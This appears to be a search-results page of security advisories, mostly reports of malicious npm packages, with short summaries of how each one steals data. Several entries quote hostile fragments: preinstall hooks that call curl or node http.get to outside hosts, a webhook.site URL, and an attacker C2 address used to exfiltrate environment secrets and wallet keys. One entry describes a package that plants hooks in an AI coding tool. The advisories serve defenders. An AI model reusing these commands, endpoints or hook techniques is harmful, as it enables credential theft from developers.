136741 matches found
Malicious code in pampipes (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 660a84b18bd4e15af0f490d3f4bfde871b12e7912493f23d5ae7a3db10a82565 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in reading-cookies (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d137cd4e8e7fc6d323c33ed04a87a97b152b217f948d01fae3172900751bf121 On import, the package's middleware spawns a detached node lib/caller.js child process. caller.js decodes a base64-obfuscated URL...
Malicious code in browserslist-db-sync (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 1e7eebaf0ec5e5d89501d240e0e11dfd758c9a9c6bcaf74a29a2dcabf1a1f502 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
MAL-2026-5850 Malicious code in vite-enhancer-config (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware f95dc5a82c03457cbfab461f0b1775f3918589db6ac513342a1ec0dc1aacc1fb Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
MAL-2026-5843 Malicious code in chai-smart-assert (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 44c476c94a62f5a3949ef8e6173aae3a6fa9b4411d7b157d06ea96835fbf258c Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in @wacrot/infra-data-kit (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1568dfa61d19a63f6837c4a8c9b5d728401d0f34c87ce3550af594c141a94ac1 On any require or import of @wacrot/infra-data-kit, src/index.js invokes addSupport at module top level, which spawns a detached bash -c 'curl -fsSL...
MAL-2026-5828 Malicious code in ogd-platform (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f17f2c263db2adee12698bd9046668b9b674bcdf063b959f54841914a6028931 The package contains only a package.json with a preinstall lifecycle script and ships no actual functionality despite advertising itself as an 'Open...
Malicious code in flow-lending (npm)
Sentinel-high 9.9.9 dependency-confusion squat of an internal Cardano/DeFi lending pkg. preinstall node index.js || true auto-execs a credential exfil: harvests env secrets mnemonic/private key/token/blockfrost API key and POSTs to raw attacker C2 2.25.140.71:8443/surflending/npm-confusion. 2-pkg...
MAL-2026-5806 Malicious code in flowdefi (npm)
flow/surf-lending DeFi cred-exfil campaign sibling c1655. preinstall node index.js || true exfils env secrets to raw C2 2.25.140.71:8443/surflending/npm-confusion verified identical. No-renotify. --- -= Per source details. Do not edit below this line.=- Source: amazon-inspector...
MAL-2026-5808 Malicious code in surf-lending (npm)
Sibling of [email protected] campaign C2 path /surflending/. Sentinel-9.9.9 dep-confusion squat; preinstall node index.js || true exfils env secrets mnemonic/key/token/blockfrost to raw C2 2.25.140.71:8443/surflending/npm-confusion. c913 + c252. --- -= Per source details. Do not edit below this...
NPM: JS-YAML: Quadratic-complexity DoS in merge key handling via repeated aliases
NPM: JS-YAML: Quadratic-complexity DoS in merge key handling via repeated aliases vulnerability discovered by ? in WordPress Npm js-yaml versions = 4.1.1...
MAL-2026-5789 Malicious code in claude-cup (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c369ccf7b5e0ef8721b5ecdc94bd843ce260923394f6c513350a58928abdbdd3 On first invocation of npx claude-cup and on every subsequent Claude Code tool call once hooks are installed, research/config-audit.js enumerates eve...
Malicious code in unicocheck-ios (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bafc91c569cf42c5f1ff68531a8d5238919f595368ffa90b7d4e5bcc74fe9788 package.json declares a preinstall lifecycle script that runs curl against https://webhook.site/fe1246c2-ac04-4493-b223-fe34ba26b79f with query...
ROOT-APP-NPM-CVE-2021-44906 CVE-2021-44906 in @rootio/minimist - Patched by Root
Root has patched CVE-2021-44906 in the @rootio/minimist package for Root:npm. Multiple fixed versions available...
MAL-2026-5751 Malicious code in oh-my-ashclaw (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector daf0a5a6234cbf55718057017cbe143ab41ad1aaf7964ebfaab6dfe12703b005 On npm install, the package's postinstall hook .prepare.cjs executes and harvests installer-side data: hostname, username, OS/arch, Node version, all...
Malicious code in warp-dependency (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 493b3ed30d94fb482e4b9c7cf3d328ba9b307f91965783f0024ec7dca1fedb96 [email protected] declares postinstall: node index.js in package.json. The index.js entry point is heavily obfuscated using obfuscator.io-style...
Malicious code in ect-839201 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0ac6cc7433a67e0087dfa415071c9338be630c2166cd38ac371afadbdd0161e3 package.json declares a preinstall lifecycle hook that runs node -e "require'http'.get'http://10.107.121.85:8001/callback839201'" on npm install. Thi...
MAL-2026-5709 Malicious code in chalk-plus-js (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f5351482f03a50cab8a28b6aa7c992c960a55c6889634d2a04bb86a157ac18d1 Package is published under a name riding the popular chalk color-output library but its source tree, README, main entry lib/nodemailer.js, and lib...
Malicious Package
Overview transportator is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...
Malicious Package
Overview ecto-win-flag-q2m7 is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...